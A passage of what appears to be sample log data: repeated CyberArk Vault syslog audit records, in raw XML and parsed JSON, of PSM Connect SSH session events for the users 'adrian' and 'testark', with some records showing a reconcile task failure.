Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:54:56</Timestamp>\n    <IsoTimestamp>2021-03-11T17:54:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 09:56:37</Timestamp>\n    <IsoTimestamp>2021-03-11T17:56:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 11 12:23:25</Timestamp>\n    <IsoTimestamp>2021-03-11T20:23:25Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>67.43.156.14</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:49:37</Timestamp>\n    <IsoTimestamp>2021-03-14T13:49:37Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:37","IsoTimestamp":"2021-03-14T13:49:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-14T13:50:43Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 14 06:50:43</Timestamp>\n    <IsoTimestamp>2021-03-14T13:50:43Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615729572\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"ReconcileTask\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:50:43","IsoTimestamp":"2021-03-14T13:50:43Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=47747796-03e1-4a11-af39-ab56c00e7732;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:31:56Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:31:56</Timestamp>\n    <IsoTimestamp>2021-03-15T10:31:56Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:31:56","IsoTimestamp":"2021-03-15T10:31:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:33:39Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:33:39</Timestamp>\n    <IsoTimestamp>2021-03-15T10:33:39Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:39","IsoTimestamp":"2021-03-15T10:33:39Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T10:35:00Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 03:35:00</Timestamp>\n    <IsoTimestamp>2021-03-15T10:35:00Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-UnixSSH-34.123.103.115-testark</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSH\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"testark\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"success\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"-1\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:00","IsoTimestamp":"2021-03-15T10:35:00Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.14;User=testark;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<5>1 2021-03-15T13:18:31Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:18:31</Timestamp>\n    <IsoTimestamp>2021-03-15T13:18:31Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>300</MessageID>\n    <Desc>PSM Connect</Desc>\n    <Severity>Info</Severity>\n    <Issuer>Administrator</Issuer>\n    <Action>PSM Connect</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>PSM</Safe>\n    <File>Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian</File>\n    <Station>81.2.69.143</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason></Reason>\n    <ExtraDetails>ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;</ExtraDetails>\n    <Message>PSM Connect</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"UnixSSHKeys\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"adrian\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.123.103.115\"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:18:31","IsoTimestamp":"2021-03-15T13:18:31Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.2.69.143","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=692fe25f-f940-4170-8ea4-5241b35173f0;SrcHost=67.43.156.14;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
